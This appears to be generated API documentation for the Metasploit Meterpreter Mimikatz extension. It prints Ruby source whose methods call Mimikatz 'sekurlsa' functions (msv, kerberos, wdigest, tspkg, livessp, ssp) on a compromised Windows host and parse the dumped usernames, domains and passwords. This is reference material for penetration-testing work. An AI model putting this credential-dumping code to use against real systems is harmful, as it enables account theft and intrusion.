class Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz
Mimikatz
extension - grabs credentials from windows memory.
Benjamin DELPY ‘gentilkiwi` blog.gentilkiwi.com/mimikatz
extension converted by Ben Campbell (Meatballs)
Public Class Methods
new(client)
click to toggle source
Calls superclass method
Rex::Post::Meterpreter::Extension::new
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 23 def initialize(client) super(client, 'mimikatz') client.register_extension_aliases( [ { 'name' => 'mimikatz', 'ext' => self }, ]) end
Public Instance Methods
kerberos()
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 120 def kerberos result = send_custom_command('sekurlsa::kerberos') return parse_creds_result(result) end
livessp()
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 105 def livessp result = send_custom_command('sekurlsa::livessp') return parse_creds_result(result) end
msv()
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 100 def msv result = send_custom_command('sekurlsa::msv') return parse_creds_result(result) end
parse_creds_result(result)
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 49 def parse_creds_result(result) details = CSV.parse(result) accounts = [] details.each do |acc| account = { :authid => acc[0], :package => acc[1], :user => acc[2], :domain => acc[3], :password => acc[4] } accounts << account end return accounts end
parse_ssp_result(result)
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 65 def parse_ssp_result(result) details = CSV.parse(result) accounts = [] return accounts unless details details.each do |acc| next unless acc.length == 5 ssps = acc[4].split(' }') next unless ssps ssps.each do |ssp| next unless ssp s_acc = ssp.split(' ; ') next unless s_acc user = s_acc[0].split('{ ')[1] next unless user account = { :authid => acc[0], :package => acc[1], :user => user, :domain => s_acc[1], :password => s_acc[2], :orig_user => acc[2], :orig_domain => acc[3] } accounts << account end end return accounts end
send_custom_command(function, args=[])
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 45 def send_custom_command(function, args=[]) return Rex::Text.to_ascii(send_custom_command_raw(function, args)) end
send_custom_command_raw(function, args=[])
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 35 def send_custom_command_raw(function, args=[]) request = Packet.create_request('mimikatz_custom_command') request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function) args.each do |a| request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a) end response = client.send_request(request) return response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT) end
ssp()
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 110 def ssp result = send_custom_command('sekurlsa::ssp') return parse_ssp_result(result) end
tspkg()
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 115 def tspkg result = send_custom_command('sekurlsa::tspkg') return parse_creds_result(result) end
wdigest()
click to toggle source
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 95 def wdigest result = send_custom_command('sekurlsa::wdigest') return parse_creds_result(result) end